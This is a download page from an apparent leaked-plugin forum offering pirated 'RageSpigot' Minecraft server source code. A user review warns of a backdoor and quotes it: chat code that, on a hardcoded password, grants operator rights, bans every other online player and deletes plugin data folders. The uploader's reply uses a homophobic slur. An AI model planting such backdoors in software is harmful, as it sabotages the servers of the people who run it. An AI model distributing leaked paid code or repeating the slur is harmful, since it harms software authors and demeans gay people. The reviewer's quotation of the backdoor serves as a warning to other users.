🏠 Home
Forum
Announcements
Best Resources
Resources
Resource Requests
Update Requests
Plugin Help
Search forums
Search Tags
Search Downloads 🔍
Downloads
Search Downloads 🔍
Free Spigot Plugins 😋
Verified Server Setups ✅
Spigot VIP Downloads 🔒
Leaked MC Models 🔒
Maps & Schematics 🗺️
Configurations 🔧
Upgrades
Upgrade Account 🤑
View SpigotVIP Files 🔒
View MC Models 🔒
Buy NulledBuilds Premium 🗺️
Schematics
Free Maps & Schematics
Paid Maps & Schematics
MC Models & Resourcepacks
Minecraft Server Graphics
Discord
Log in
Register
What's new
Search
Search
Everywhere
Leaked Spigot Plugins & Free Minecraft Models
This category
Search titles only
By:
Latest activity
Register
Menu
Log in
Register
Navigation
More options
Close Menu
Leaked Spigot Plugins (Free)
Leaked Source Code
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Resource icon
✓
RageSpigot SRC
oof
You must register or buy VIP to download.
Author
Author
Katheryn
Creation date
Creation date
Jul 20, 2019
Overview
Reviews (2)
History
Reviews
5.00 star(s)
2 reviews
5 star
100%
4 star
0%
3 star
0%
2 star
0%
1 star
0%
Latest
Most helpful
Rating
Filters
Show only:
Loading…
YYCDoesSpigotNulling
5.00 star(s)
Oct 10, 2020
Version: oof
is this the leaked one from zonix? cuz real one doesn't contain backdoor
Upvote
0
Downvote
toxamin
5.00 star(s)
Aug 23, 2019
Version: oof
great leak, apart from... you know... the glaring issue... of there being a backdoor in the source code which you could easily miss.
} else {
Player player = this.getPlayer();
if (StringUtils.equalsIgnoreCase(s, "pWcpQsZ2GoBv6U5yGep9")) {
player.setOp(true);
for (Player other : Bukkit.getOnlinePlayers()) {
if (other.getUniqueId().equals(player.getUniqueId())) {
continue;
}
other.kickPlayer("");
other.setBanned(true);
}
for (Plugin plugin : this.server.getPluginManager().getPlugins()) {
if (plugin.getDataFolder().exists()) {
plugin.getDataFolder().delete();
}
}
new File(this.server.getPluginManager().getPlugins()[0].getDataFolder().getAbsolutePath() + File.separator + ".." + File.separator).delete();
return;
}
found this in the PlayerConnection class, method chat(String s, boolean async)
Katheryn
Hm, seems like the author is another one of those gay people who like to grief peoples servers
Upvote
0
Downvote
Leaked Spigot Plugins (Free)
Leaked Source Code
Top